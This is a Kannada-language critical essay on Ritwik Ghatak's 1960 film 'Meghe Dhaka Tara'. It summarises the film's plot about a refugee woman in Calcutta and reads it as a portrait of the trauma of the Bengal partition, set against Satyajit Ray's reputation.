ಋತ್ವಿಕ್ ಘಟಕ್ ಅವರ ಮೇಘೆ ಢಾಕಾ ತಾರಾ

ಋತ್ವಿಕ್ ಘಟಕ್ ಅವರ ಏಳು ಪ್ರಮುಖ ಚಲನಚಿತ್ರಗಳಲ್ಲಿ 1960ರಲ್ಲಿ ತಯಾರಾದ ‘ಮೇಘೆ ಢಾಕಾ ತಾರಾ’ (ಮೋಡ ಮುಚ್ಚಿದ ನಕ್ಷತ್ರ) ಬಹಳ ಮಹತ್ವದ್ದು. ಈ ವರ್ಷ ಈ ಸಿನಿಮಾಕ್ಕೆ 60 ವರ್ಷ ತುಂಬುವ ಕಾರಣದಿಂದ ಅದರ ಚರ್ಚೆ ಮಹತ್ವದ್ದು ಮತ್ತು ಪ್ರಸ್ತುತ.

ಭಾರತೀಯ ಸಿನಿಮಾ ಸಂದರ್ಭದಲ್ಲಿ, ವಿಶೇಷವಾಗಿ ಸಿನಿಮಾ ಚರಿತ್ರೆಯ ಬಗೆಗೆ ಯಾವಾಗಲೂ ಕೆಲವು ತಾತ್ವಿಕ ತಕರಾರು ತೆಗೆಯುವ ಕೆಲವು ವಿದ್ವಾಂಸರು (ಆಶೀಷ್ ರಾಜ್ಯಾಧ್ಯಕ್ಷ, ಮದನ್ ಗೋಪಾಲ್ ಸಿಂಗ್ ಮತ್ತು ಇರಾ ಭಾಸ್ಕರ್) ಸಿನಿಮಾ ಚರಿತ್ರೆಯನ್ನು ಸತ್ಯಜಿತ್ ರೇ ಅಂತಹವರು ಯಜಮಾನಿಕೆಯಿಂದ ಪ್ರಭಾವಿಸಿದ ಬಗೆಗೆ ಪದೇಪದೇ ಉಲ್ಲೇಖಿಸುತ್ತಾರೆ. ತಮ್ಮ ಇತ್ತೀಚಿನ ಕೃತಿಯಲ್ಲಿ (ಆಶೀಷ್: ಇಂಡಿಯನ್ ಸಿನಿಮಾ: ಓ.ಯು.ಪಿ) ಅವರು ಸುಮಾರು 1913ರಲ್ಲಿ ಭಾರತದ ಸಿನಿಮಾ ಅನುಭವ ಆರಂಭವಾಗುವ ಹೊತ್ತಿಗಿನ ಭಾರತದ ಸಿನಿಮಾ ಸಂತ, ಪ್ರವರ್ತಕ, ಪಿತಾಮಹ ಎಂದೆಲ್ಲಾ ಕರೆಸಿಕೊಳ್ಳುವ ದಾದಾ ಸಾಹೇಬ್ಫಾಲ್ಕೆಯವರ ಒಂದು ಹೇಳಿಕೆ ಮತ್ತು 1956ರ ಕಾನ್ ಚಲನಚಿತ್ರೋತ್ಸವದಲ್ಲಿ ಸತ್ಯಜಿತ್‍ರೇಯವರ ‘ಪಥೇರ್ ಪಾಂಚಾಲಿ’ ಸಿನಿಮಾವು ಹ್ಯೂಮನ್ ಡಾಕ್ಯುಮೆಂಟ್ ಪ್ರಶಸ್ತಿ ಪಡೆದಂತಹ ಸಂದರ್ಭದಲ್ಲಿ ಮಾಡಿದಂತಹ ಹೇಳಿಕೆಯ ಆಧಾರದ ಮೇಲೆ ಇಂತಹ ಒಂದು ಬಹು ಮುಖ್ಯವಾದ ಯಜಮಾನಿಕೆ ಮತ್ತು ಸಬಾಲ್ಟರ್ನೀಕರಣದ ರಾಜಕಾರಣದ ವಿನ್ಯಾಸವನ್ನು ನಮಗೆ ಮಾಡಿಸುತ್ತಾರೆ. 

ಫಾಲ್ಕೆ ಮತ್ತು ರೇ ಇಬ್ಬರೂ ಕೂಡಾ ‘ಭಾರತೀಯ ಎನ್ನುವ ಸಿನಿಮಾ ಸಾಧ್ಯತೆಯೇ ನಮ್ಮಿಂದ, ಅಂದರೆ ಅವರ ಕೃತಿ ಅರ್ಥಾತ್ ಸಿನಿಮಾಗಳಿಂದ ಆರಂಭವಾಯಿತು’ ಎನ್ನುವುದನ್ನು ಇದಕ್ಕೆ ಸಾಮಗ್ರಿಯಾಗಿ ಬಳಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಇದೇ ಹೊತ್ತಿಗೆ ಭಾರತೀಯ ಸಿನಿಮಾ ಎಂಬುದಿದೆಯೇ? ಅಂತಹ ಒಂದು ಅನುಭವ ಯಾವುದು? ಎನ್ನುವ ಬಹಳ ಮುಖ್ಯವಾದ ತಾತ್ವಿಕ ಪ್ರಶ್ನೆಯನ್ನೂ ಕೂಡಾ ಅವರು ಎತ್ತುತ್ತಾರೆ.

ಭಾರತೀಯ ಸಿನಿಮಾ ಎಂದರೆ ಭಾರತದ ಬೇರೆ ಬೇರೆ ಪ್ರದೇಶ, ಭಾಷೆ, ವಸ್ತು, ಕಥನಗಳ ಒಟ್ಟು ಮೊತ್ತ. ಭಾರತೀಯ ಸಿನಿಮಾವೆಂಬುದು ಒಂದು ನೆಲೆಯಲ್ಲಿ ಕಲ್ಪಿತವಾದುದು ಕೂಡಾ. ಭಾರತೀಯ ಸಿನಿಮಾ ಎಂಬ ಸಂಗತಿಯೇ ರಾಷ್ಟ್ರಕ್ಕೆ ಅನುರೂಪಿಯಾದಂತಹ ಒಂದು ಸಿನಿಮಾವನ್ನು ಸಾಮಾನ್ಯ ಅರ್ಥದಲ್ಲಿ ಕಲ್ಪಿಸಿ ಆಗ್ರಹಿಸುತ್ತದೆ. ಇದೇ ರೀತಿಯಲ್ಲಿಯೇ ಹಿಂದಿ ರಾಷ್ಟ್ರದ ಭಾಷೆಯೂ ಆಯಿತು. ಹಿಂದಿ ಸಿನಿಮಾವು ರಾಷ್ಟ್ರೀಯ ಸಿನಿಮಾವೆಂಬ ಪ್ರತಿನಿಧೀಕರಣವನ್ನೂ ಕೂಡಾ ಪಡೆಯಿತು. ಆದರೆ ಹಿಂದಿಯನ್ನು ಹೊರತು ಪಡಿಸಿದ ದೊಡ್ಡದಾದ ಬಹುವಚನೀಯ ಅಭಿವ್ಯಕ್ತಿಯನ್ನು ಹೊಂದಿರುವಂತಹ ವಿಶ್ವವಿದೆ. ಈ ಕಾರಣದಿಂದ ಹಿಂದಿಯ ಸಿನಿಮಾವನ್ನು ಮುಖ್ಯವಾಹಿನೀ ಮತ್ತು ರಾಷ್ಟ್ರೀಯವೆಂದು ಪರಿಗಣಿಸುವಲ್ಲಿ ಬಿಕ್ಕಟ್ಟುಗೊಳಿರುವುದು.

ಸದ್ಯದ ಹಿಂದೀ ರಾಷ್ಟ್ರ ಭಾಷೆಯ ವಿವಾದದ ಸಂದರ್ಭದಲ್ಲೂ ಕೂಡಾ ಹಿಂದಿ ಭಾಷೆಯಾಗಿ ನಮಗೆ ತಕರಾರಾಗದೆ ಅದರ ಯಜಮಾನಿಕೆಯು ಸ್ವೀಕರಣಯೋಗ್ಯವಾಗದೆ ವಿರೋಧವನ್ನು ಪಡೆಯಿತು. ಇಂತದ್ದೇ ರೀತಿಯ ಸಾಂಸ್ಕತಿಕ ಬಿಕ್ಕಟ್ಟು ಮತ್ತು ಯಜಮಾನಿಕೆಯ ಮುಖಾಮುಖಿಯು ಭಾರತೀಯ ಸಿನಿಮಾದ ಸಂದರ್ಭದಲ್ಲಿ ರೇ-ಫಾಲ್ಕೆಯವರ ಹೇಳಿಕೆ ಕೂಡಾ ಒಂದು ನೆಲೆಯ ಯಜಮಾನಿಕೆಯ ಹೇಳಿಕೆಯಾಗಿ ಸಿನಿಮಾ ಚರಿತ್ರೆಯನ್ನೇ ಬಾಧಿಸಿತು. ಇದು ರೇ ಅವರಂತೆಯೇ ಭಾರತವೆಂಬ ರಾಷ್ಟ್ರ ಮತ್ತು ಸಿನಿಮಾ ಅನುಭವವನ್ನು ಪ್ರತಿನಿಧಿಸುವಂತಹ ಘಟಕ್‍ರಂತಹ ಯೋಗ್ಯ, ಪ್ರತಿಭಾಶಾಲೀ ನಿರ್ದೇಶಕನ ಕೃತಿಗಳನ್ನು ಒಂದು ಸೀಮಿತ ಅವಧಿಯವರೆಗೆ ಅಂದರೆ ಸರಿಸುಮಾರು 1970ರವರೆಗೂ ಕೂಡಾ ಆಪೋಶನ ತೆಗೆದುಕೊಂಡು ತೆರೆಮರೆಯಲ್ಲಿರಿಸಿತು.

ರೇ ಮತ್ತು ಘಟಕ್ ಸಂದರ್ಭದಲ್ಲಿ ಇವರು ಹೆಚ್ಚು, ಅವರು ಹೆಚ್ಚೆಂಬ ಮೇಲಾಟ ಸಲ್ಲ ಮತ್ತು ಅಗತ್ಯವಿಲ್ಲವಾದರೂ ಇಬ್ಬರೂ ಅನನ್ಯ ಆದ್ಭುತ ಪ್ರತಿಭೆಗಳು ಎನ್ನುವ ಸಂದರ್ಭದಲ್ಲಾದರೂ ಘಟಕ್ ಅವರ ಪ್ರತಿಭೆಯನ್ನು ಕಾಣಲು ನಮಗೆ ಮಾಡಿಕೊಡಬಹುದಾದ ಅವಕಾಶದಲ್ಲಿ ರಾಜಕಾರಣ ಮಾಡಬಾರದಷ್ಟೇ. ಘಟಕ್ ಪಾಲಿಗೆ ಚರಿತ್ರೆ ಮತ್ತು ಸಿನಿಮಾ ಚರಿತ್ರೆಯು ಈಗಾಗಲೇ ಹೀಗೆ ಮಾಡಿದೆ. ಘಟಕ್ ಅವರ ಮೊದಲ ಸಿನಿಮಾ ‘ನಾಗರಿಕ್’ ಕೂಡಾ ಸಿದ್ಧಗೊಂಡಿದ್ದು ರೇ ಅವರ ಪಥೇರ್ ಪಾಂಚಾಲಿ ತಯಾರಾದ ಆಸುಪಾಸಲ್ಲಿ. ಆದರೂ ಅದು ಬಿಡುಗಡೆಗೊಂಡಿದ್ದು ಸುಮಾರು 70ರ ದಶಕದಲ್ಲಿ. ಅದಕ್ಕೆ ಕಾರಣ ಕೊನೆಯ ಪ್ರಿಂಟ್ ಬಂದ ನಂತರ ಘಟಕ್ ಹತ್ತಿರ ಬಿಡುಗಡೆಗೆ ಹಣವಿಲ್ಲದಿದ್ದದ್ದು. ಆದರೆ ರೇಯವರ ಪಥೇರ್ ಪಾಂಚಾಲಿಯನ್ನು (ಪಥೇರ್ ಪಂಚಾಲಿ ಅಂದರೆ ರಸ್ತೆಯ ಹಾಡು) ಪಶ್ಚಿಮ ಬಂಗಾಳದ ಸರ್ಕಾರದ ರಸ್ತೆ ಮತ್ತು ಸಾರಿಗೆ ಇಲಾಖೆ ನಿರ್ಮಿಸಿತು. ನಂತರ 1954ರ ಹೊತ್ತಿಗೆ ರೇ ಚರಿತ್ರೆ ನಿರ್ಮಿಸಿದರೆನ್ನುವುದು ಸತ್ಯ. ಅಂತಹ ಚರಿತ್ರೆ ಘಟಕ್‍ಗೆ ಯಾವುದೇ ಅವಕಾಶವನ್ನು ಕೊಡಲಿಲ್ಲ. ಆದರೆ ಭಾರತೀಯ ಸಿನಿಮಾ ಚರಿತ್ರೆಯಲ್ಲಿ ತನ್ನ ಕಥನಗಳಿಗೆ ಮೂಲ ಮತ್ತು ಪ್ರೇರಣೆಯಾಗಿ ಚರಿತ್ರೆಯಿಂದಲೇ ಅಪಾರ ಸಾಮಗ್ರಿ ಪಡೆದವರಿದ್ದರೇ ಅದು ಘಟಕ್ ಮಾತ್ರ.

‘ಮೋಡ ಮುಚ್ಚಿದ ನಕ್ಷತ್ರ’ ಕಥೆ

ಕಲ್ಕತ್ತೆಯ ಹೊರವಲಯದ ಒಂದು ಸ್ಲಮ್. ಪೂರ್ವ ಪಾಕಿಸ್ತಾನದಿಂದ ವಲಸೆ ಬಂದಿರುವ ಅನೇಕ ನಿರಾಶ್ರಿತರ ಕುಟುಂಬಗಳೆಡೆಯಲ್ಲಿ ಸುಂದರಿ ಮತ್ತು ಸದೃಢ ಯುವತಿ ನೀತಾಳ (ಸುಪ್ರಿಯಾ ಚೌಧರಿ) ಕುಟುಂಬವೂ ವಾಸವಿತ್ತು. ಈಕೆಯ ದುಡಿಮೆಯ ಮೇಲೆಯೇ ಬಹುತೇಕ ಅವಲಂಬಿತವಾದ ಸಂಸಾರ. ತನ್ನ ಬಗ್ಗೆ ಹೆಚ್ಚು ಯೋಚಿಸದ ಈಕೆಯನ್ನು ಸುತ್ತಲಿನ ಪರಿಸರ, ವಿಶೇಷವಾಗಿ ಈಕೆಯ ಕುಟುಂಬವೇ ಹೆಚ್ಚು ಬಳಸಿಕೊಳ್ಳುತ್ತಿರುತ್ತದೆ.

ಅಪ್ಪ ವಯೋವೃದ್ಧ ನಿವೃತ್ತ ಶಾಲಾ ಶಿಕ್ಷಕ. ಅವಳ ಅಣ್ಣ ದುಡಿಮೆಯಿರದವ ಮತ್ತು ಒಬ್ಬ ಸಂಗೀತಗಾರನಾಗಬೇಕೆಂಬ ತಯಾರಿಯಲ್ಲಿರುವವ. ನೀತಾ ಕೊನೆಗೆ ತನ್ನ ದೀರ್ಘಕಾಲದ ಪ್ರಿಯಕರ ಸನತ್‍ನನ್ನೂ ಕುಟುಂಬಕ್ಕೋಸ್ಕರ ತ್ಯಜಿಸುತ್ತಾಳೆ. ಆದರೆ ಕೆಲವೇ ಸಮಯದಲ್ಲಿ ಆಕೆಯ ಚೆಲ್ಲುಚೆಲ್ಲು ಸ್ವಭಾವದ ತಂಗಿ ಓದನ್ನು ಸರಿಯಾಗಿ ಮಾಡದೇ ಅಕ್ಕನ ಪ್ರಿಯಕರನನ್ನೇ ಪ್ರೀತಿಸಿ ಮದುವೆಯಾಗಿ ಬೇರೆ ಹೋಗುತ್ತಾಳೆ. ಒಬ್ಬನೇ ತಮ್ಮ ಫುಟ್ಬಾಲ್ ಆಟಗಾರನಾಗಬೇಕೆಂದು ಕನಸು ಕಂಡು ಉಂಡಾಡಿಯಾಗಿದ್ದ. ಆತನನ್ನು ಮತ್ತು ಆತನ ಕನಸನ್ನೂ ಈಕೆ ಪೊರೆಯಬೇಕು.

ಮನೆಯ ಸದಸ್ಯರಲ್ಲಿ ಅಣ್ಣ ಮಾತ್ರ ಆಕೆಯ ಬಗ್ಗೆ ಪ್ರೀತಿ ಕಾಳಜಿಯನ್ನು ತೋರುವಾತ. ಆದರೆ ಕ್ರಮೇಣ ಆತನೂ ಊರು ಬಿಟ್ಟು ಮುಂಬಯಿ ಸೇರಿ ಸಂಗೀತ ಕಲಿತು ಪ್ರಸಿದ್ಧ ಸಂಗೀತಗಾರನಾಗಿ ಕಛೇರಿಯನ್ನೂ ಕೊಡುತ್ತಾ ಅಪಾರ ಹಣವನ್ನು ಸಂಪಾದಿಸತೊಡಗಿದ. ಆದರೆ ಇತ್ತ ನೀತಾ ಮಾತ್ರ ತನ್ನನ್ನು ತಾನು ಸಾಕಲಾರದೇ, ಸಂಸಾರದ ಭಾರದಿಂದ ಬಳಲಿ ಕ್ಷಯರೋಗಕ್ಕೆ ತುತ್ತಾಗುತ್ತಾಳೆ. ಅಣ್ಣ ಪುನಃ ಮನೆಗೆ ಬಂದು ನೀತಾಳನ್ನು ಚಿಕಿತ್ಸೆಗೆ ಕರೆದೊಯ್ಯುತ್ತಾನೆ. ಅಣ್ಣನ ತೊಡೆಯ ಮೇಲಿಂದಲೇ ನೀತಾಳು ‘ನಾನು ಬದುಕಬೇಕು’ ಎಂಬ ಕಡೆಯ ಮಾತನ್ನು ಆಡುತ್ತಾಳೆ. ಸಿನಿಮಾ ಕೊನೆಗೊಳ್ಳುತ್ತದೆ.

ಸ್ವಾತಂತ್ರ್ಯ ಸಂದರ್ಭದ ದೇಶ ವಿಭಜನೆಯು ಮತ್ತದರ ಚರಿತ್ರೆ ಮತ್ತು ಸ್ಮತಿ ಘಟಕ್‍ರ ಸತ್ವವನ್ನೂ ರೂಪಿಸಿತು. ಭಾರತೀಯ ಸಿನಿಮಾ ಚರಿತ್ರೆಯ ಬಗೆಗೆ ಬಂದಂತಹ ವಿಶ್ವಕೋಶಗಳು ಕೂಡಾ ಎಲ್ಲಿಯೂ ಘಟಕ್‍ರನ್ನು ಪ್ರಸ್ತಾಪಿಸಿರಲಿಲ್ಲ. ಸುಮಾರು 1970ರ ವರೆಗೆ ರೇಯವರ ಪ್ರಭಾವಳಿಯು ಇನ್ನೊಂದು ಪ್ರಭೆಯನ್ನು ಮುನ್ನೆಲೆಗೆ ತರಲಿಲ್ಲವೆಂದೇ ಕೆಲವರು ಸಿನಿಮಾ ವಿದ್ವಾಂಸರು ಅಭಿಪ್ರಾಯಿಸುತ್ತಾರೆ. ಬಹುಶಃ ಘಟಕ್‍ರ ಸಿನಿಮಾಗಳ ಮೊತ್ತಮೊದಲ ಸಾರ್ವಜನಿಕ ಪ್ರದರ್ಶನವು ಸುಮಾರು 1970ರ ದಶಕದಲ್ಲಿ ಜರುಗಿತು. ಅದೂ ಕೂಡಾ ದೆಹಲಿಯಲ್ಲಿ ಪ್ರಖ್ಯಾತ ಸಿನಿಮಾ ವಿದ್ವಾಂಸೆ ಪ್ರೊಫೆಸರ್ ಇರಾ ಭಾಸ್ಕರ್ ಮತ್ತು ಇನ್ನೊಬ್ಬ ಸಿನಿಮಾ ಚಿಂತಕ ಮದನ್ ಗೋಪಾಲ್ ಸಿಂಗ್ ಅವರ ನೇತೃತ್ವದಲ್ಲಿ.

ಒಂದು ರೀತಿಯಲ್ಲಿ ಅಂದು ಪ್ರದರ್ಶಿತಗೊಂಡ ಘಟಕ್‍ರ ಮೇಘ ಢಾಕಾ ತಾರಾ (1960) ಘಟಕ್‍ರನ್ನು ಜಗತ್ತಿಗೆ ಪರಿಚಯಿಸಿತು. ಇದು ಘಟಕ್ ಸಿನಿಮಾಗಳ ಕುರಿತು ಜಾಗತಿಕವಾದ ವೀಕ್ಷಣೆ, ಓದು ವಿಮರ್ಶೆ ಮತ್ತು ಅಧ್ಯಯನದ ಅವಕಾಶ ಹಾಗೂ ಪರ್ಯಾಯವನ್ನು ಹುಟ್ಟು ಹಾಕಿತು. ಆಗ ಘಟಕ್‍ರ ಸಿನಿಮಾಗಳ ಒಳ್ಳೆಯ ಪ್ರಿಂಟ್ ಏನೂ ಲಭ್ಯವಿರಲಿಲ್ಲ. ಲಭ್ಯವಿರುವ ಪ್ರಿಂಟ್‍ಗಳು ಕಲ್ಕತ್ತಾದ ಯಾವುದೋ ಒಂದು ವಿ.ಸಿ.ಡಿ. ಅಂಗಡಿ ತಂದಿದ್ದ ಸಾಮಾನ್ಯ ದರ್ಜೆ ಮತ್ತು ಗುಣಮಟ್ಟದ್ದಾಗಿದ್ದವು. ಬಾಂಗ್ಲಾದೇಶದಲ್ಲಿ ಅವರ ಬಹುತೇಕ ಸಿನಿಮಾಗಳ ಪ್ರಿಂಟ್ ಲಭ್ಯವಿತ್ತು. ಇರಾ ಮತ್ತು ಮದನ್‍ಗೋಪಾಲ್ ಸೇರಿ ಆಗಿನ ಪಶ್ಚಿಮ ಬಂಗಾಲದ ಸರ್ಕಾರದಲ್ಲಿ ಮಂತ್ರಿಯಾಗಿದ್ದ ಸಫ್ದಾರ್ ಹಶ್ಮಿಯವರ ಮನವೊಲಿಸಿ ಅಲ್ಲಿಂದ ಪ್ರಿಂಟ್‍ಗಳನ್ನು ತರಿಸಿ ಭಾರತದ ವಿವಿಧ ಭಾಗಗಳಲ್ಲಿ ಅವುಗಳನ್ನು ಪ್ರದರ್ಶಿಸುವುದರ ಮೂಲಕ ಸಂಪೂರ್ಣ ಕಳೆದೇ ಹೋಗಿದ್ದ ಘಟಕ್‍ರನ್ನು ಜಗತ್ತಿಗೆ ಪರಿಚಯಿಸಿದರು.

ಋತ್ವಿಕ್ ಘಟಕ್‍ರವರ ಏಳು ಪ್ರಮುಖ ಚಲನಚಿತ್ರಗಳಲ್ಲಿ 1960ರಲ್ಲಿ ತಯಾರಾದ ‘ಮೇಘೆ ಢಾಕಾ ತಾರಾ’ ಬಹಳ ಮಹತ್ವದ್ದು. ಈ ವರ್ಷ ಈ ಸಿನಿಮಾಕ್ಕೆ 60 ವರ್ಷ ತುಂಬುವ ಕಾರಣದಿಂದ ಸದ್ಯದ ಅದರ ಚರ್ಚೆ ಮಹತ್ವದ್ದು. ಬಹುಶಃ ಘಟಕ್‍ರನ್ನು ಜಗತ್ತಿನ ಸಿನಿಮಾ ಭೂಪಟದಲ್ಲಿ ಅತ್ಯಂತ ಗಟ್ಟಿಯಾಗಿ ನಿಲ್ಲಿಸಿತು. ಸಿನಿಮಾ ವಿಮರ್ಶೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಕೂಡಾ ಘಟಕ್ ದೃಢವಾಗಿ ಜಾಗ ಪಡೆದರು. ಮೇಘೆ ಢಾಕಾ ತಾರಾ ಎಂದರೆ ಮೋಡ ಮುಚ್ಚಿದ ನಕ್ಷತ್ರ. ಶಕ್ತಿಪಾದ ರಾಜಗುರು ಎನ್ನುವ ಬಂಗಾಳೀ ಕಾದಂಬರಿಕಾರನ ಅದೇ ಹೆಸರಿನ ಕಾದಂಬರಿಯನ್ನು ಆಧರಿಸಿ ಇದನ್ನು ನಿರ್ಮಿಸಲಾಯಿತು. ಇದನ್ನು ಕೋಮಲ್ ಗಾಂಧಾರ್ (1961) ಮತ್ತು ಸುವರ್ಣರೇಖಾ (1962) ಜತೆಗಿರುವ ಟ್ರಲಜಿ ಅಥವಾ ತ್ರಿವಳಿ ಚಿತ್ರದ ಭಾಗವಾಗಿಯೂ ಕಾಣಲಾಗುತ್ತದೆ. ಈ ಮೂರು ಸಿನಿಮಾಗಳು ಮುಖ್ಯವಾಗಿ 1947ರ ಭಾರತದ ವಿಭಜನೆಯ ಸಂದರ್ಭದ ಬಂಗಾಳದ ವಿಭಜನೆಯ ಸುತ್ತ ಚಿತ್ರಿತವಾಗಿವೆ. ಅತ್ಯಂತ ಜನಪ್ರಿಯ ಮೆಲೋಡ್ರಾಮಾ ಕೂಡಾ ಆಗಿರುವ ಈ ಚಿತ್ರ ಕನ್ನಡವೂ ಸೇರಿದಂತೆ ಹಲವು ಭಾಷೆಗಳಲ್ಲಿ ಪುನರ್ ನಿರ್ಮಾಣಗೊಂಡಿವೆ.

‘ಮೇಘೆ ಢಾಕಾ ತಾರಾ’ದಲ್ಲಿ ಅಣ್ಣ ಮನೆಗೆ ಬಂದಾಗ ಆಕೆಯ ಚಿಕಿತ್ಸೆಯ ಬಗ್ಗೆ ಪ್ರಸ್ತಾಪಿಸಿದಾಗ ನೀತಾ ಹೇಳುವ, ‘ನನ್ನ ಮುರಿದ ಹೃದಯ ಮತ್ತು ಮನಸ್ಸನ್ನು ಸರಿಪಡಿಸಲಾದೀತೇ?’ ಎಂದು ಕೇಳುವ ಪ್ರಶ್ನೆ ಇಡೀ ಸಿನಿಮಾದ ಒಂದು ಕೇಂದ್ರ ಪ್ರಶ್ನೆಯಂಬಂತೆ ಕಾಣುತ್ತದೆ. ಇದು ಒಂದು ನೆಲೆಯಲ್ಲಿ ನೀತಾಳ ಖಾಸಗೀ ಬದುಕಿನ ಬವಣೆಯಂತೆ ಕಂಡರೂ ಅದನ್ನು ಮೀರಿ ಸುಮಾರು 1947ರಲ್ಲಿ ಭಾರತದ ವಿಭಜನೆಯಿಂದುಂಟಾದಂತಹ ಬಂಗಾಳದ ವಿಭಜನೆ ಮತ್ತು ಅದು ಉಂಟು ಮಾಡಿದ ಸಾವು, ನೋವು, ಹಿಂಸೆ ಮತ್ತು ನಿರ್ವಸತೀಕರಣದಂತಹ ಸಂಗತಿಗಳು ಮತ್ತು ಅದು ಉಂಟುಮಾಡಿದಂತಹ ಸರಿಪಡಿಸಲಾಗದ ಮನೋಶಾಸ್ತ್ರೀಯ ನೆಲೆಯ ಆಘಾತವೇನಿದೆ ಅದರ ಬಿಂಬವಾಗಿಯೇ ಕಾಣಿಸುತ್ತದೆ.

ಇಂತಹ ಘನಘೋರ ಅನುಭವದ ಕುರಿತು ನಂತರದಲ್ಲಿ ಸಾಹಿತಿ, ಕವಿ, ಚಿತ್ರಕಾರರು ಪ್ರತಿಕ್ರಿಯಿಸಿದ್ದರೂ ಅತ್ಯಂತ ಗಂಭೀರವಾದ ನೆಲೆಯಲ್ಲಿ ವಿಭಜನೆಯನ್ನು ಕಟ್ಟಿಕೊಡಲು ಶಕ್ತರಾಗಿರಲಿಲ್ಲ. ಇದನ್ನು ಸಮರ್ಥವಾಗಿ ಕಟ್ಟಿಕೊಟ್ಟ ಕಾರಣದಿಂದ ಘಟಕ್ ಅವರ ಸಿನಿಮಾಗಳು ಬಹುಮುಖ್ಯವಾಗುತ್ತವೆ.

ಇದೇ ಹೊತ್ತಿಗೆ ಹೊಸ ರಾಷ್ಟ್ರವಾಗುವ ಮತ್ತು ಹೊಸ ರಾಷ್ಟ್ರವನ್ನಾಗಿ ಕಟ್ಟುವ ಸಂದರ್ಭದಲ್ಲಿ ರಾಷ್ಟ್ರನಾಯಕರು ಈ ರೀತಿಯ ವಿಭಜನೆಯ ಪರಿಣಾಮವನ್ನು ಸರಿಯಾಗಿ ನಿರ್ವಹಿಸದಿದ್ದುದರ ಲಕ್ಷಣವಾಗಿಯೂ ಗೋಚರಿಸುತ್ತದೆ. ಇಂತಹ ಘನಘೋರ ಅನುಭವದ ಕುರಿತು ನಂತರದಲ್ಲಿ ಸಾಹಿತಿ, ಕವಿ, ಚಿತ್ರಕಾರರು ಪ್ರತಿಕ್ರಿಯಿಸಿದ್ದರೂ ಅತ್ಯಂತ ಗಂಭೀರವಾದ ನೆಲೆಯಲ್ಲಿ ವಿಭಜನೆಯನ್ನು ಕಟ್ಟಿಕೊಡಲು ಶಕ್ತರಾಗಿರಲಿಲ್ಲ. ಇದನ್ನು ಸಮರ್ಥವಾಗಿ ಕಟ್ಟಿಕೊಟ್ಟ ಕಾರಣದಿಂದ ಘಟಕ್ ಅವರ ಸಿನಿಮಾಗಳು ಬಹುಮುಖ್ಯವಾಗುತ್ತವೆ.

ಪಾಕಿಸ್ತಾನ ಮತ್ತು ಭಾರತದ ವಿಭಜನೆಯನ್ನು ಸಾದತ್ ಹಸನ್ ಮಂಟೋ ದಕ್ಷವಾಗಿ ಸಾಹಿತ್ಯಾತ್ಮಕವಾಗಿ ನಿರೂಪಿಸಿದ ಹಾಗೆ ಬಂಗಾಳ ವಿಭಜನೆಯನ್ನು ಘಟಕ್ ಸಿನಿಮಾಗಳ ಮೂಲಕ ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಚಿತ್ರಿಸಿದರು. ಬಂಗಾಳ ವಿಭಜನೆಯು ಉಂಟುಮಾಡಿದ ಮುರಿತ, ಆರ್ಥಿಕ-ಸಾಂಸ್ಕತಿಕ ಜರ್ಜರಿತವನ್ನು ತಮ್ಮ ಟ್ರಲಜಿಗಳಲ್ಲಿ ತಂದರು. ಈ ರೀತಿ ವಿಭಜನೆಯ ಯಶಸ್ವಿ ಚಿತ್ರಣ ಸಾಧ್ಯವಾಗಿದ್ದು ಸ್ವತಃ ಅವರೇ ವಿಭಜನೆಯ ಬಲಿಪಶುವಾದ ಕಾರಣದಿಂದ. ಅಂದಿನ ಬಂಗಾಳದ ಜೀವನವನ್ನು ಚಿತ್ರಗಳಲ್ಲಿ ಕಟ್ಟಿ ಕೊಡುವ ಸಂದರ್ಭದಲ್ಲಿ ಘಟಕ್, ರೇ ಮತ್ತು ಮೃಣಾಲ್‍ಸೇನ್ ಮುಂಚೂಣಿಯಲ್ಲಿದ್ದವರು. ಉಳಿದ ಇಬ್ಬರಿಗಿಂತ ಭಿನ್ನವಾಗಿ ಘಟಕ್ ತಮ್ಮ ದೃಶ್ಯೀಯ ನಿರೂಪಣೆಗಳಲ್ಲಿ ಪುರಾಣ ಮತ್ತು ಮೆಲೋಡ್ರಮಣಿಕ್ ಅಂಶಗಳನ್ನು ಬಹುವಾಗಿ ನೆಚ್ಚಿದರು. ರಂಗ ಕುಶಲತೆ, ಇಪ್ತಾದಂತಹ ಪ್ರಗತಿಪರ ರಂಗ-ಸಾಹಿತ್ಯಿಕ ಚಳವಳಿಯ ಪ್ರಭಾವ-ಪ್ರೇರಣೆ, ಸರ್ಗಿ ಐಸಿನ್‍ಸ್ಟೀನ್‍ರಂತಹ ಸಿನಿಮಾ ದಿಗ್ಗಜನ ಆಧುನಿಕ ಮಾಂತಾಜ್ ಅಸ್ತಟಿಕ್ಸ್ ಮತ್ತು ಬಂಗಾಳೀ ಪ್ರಸಿದ್ಧ ಕವಿ ಸಾಹಿತಿ ರವೀಂದ್ರನಾಥ ಠಾಗೋರ್‍ರಂತವರ ಪ್ರಭಾವ ಮತ್ತು ಪ್ರೇರಣೆಯು ‘ಮೇಘ ಢಾಕಾ ತಾರಾ’ದಂತಹ ಮಹಾಕಾವ್ಯವನ್ನು ಸೃಷ್ಟಿಸುವಂತೆ ಮಾಡಿತು. ಘಟಕ್ ತಮ್ಮ ಸಿನಿಮಾಗಳ ವ್ಯಕ್ತಿಗತ, ಸಾಮಾಜಿಕ ಮತ್ತು ಸಾಂಸ್ಕತಿಕ ಅನುಭವವನ್ನು ರೇಯವರ ರಿಯಲಿಸಂಗಿಂತ ಭಿನ್ನವಾದ ಎಕ್ಸ್‍ಪ್ರಶನಿಸಂ ಮತ್ತು ಸಂಗೀತಮಯ ಮೆಲೋಡ್ರಮಟಿಕ್ ನಿರೂಪಣೆಯ ಮೂಲಕ ಸಾಧಿಸಿದರು.

ಯುನಿವರ್ಸಿಟಿಯಲ್ಲಿ ಪದವಿ ಪಡೆದರೂ ಕೂಡಾ ಸ್ವಂತಹಿತವನ್ನು ಆಲೋಚಿಸದೇ ಕುಟುಂಬವನ್ನು ಪೊರೆದ ಅವಳ ಕಥೆಯು ಕೇವಲ ಒಂದು ನಿರಾಶ್ರಿತರ ಕಥೆಯಷ್ಟೇ ಆಗುವುದನ್ನು ಘಟಕ್‍ರ ವಿಶಾಲದೃಷ್ಟಿ ನೀಗಿತು.

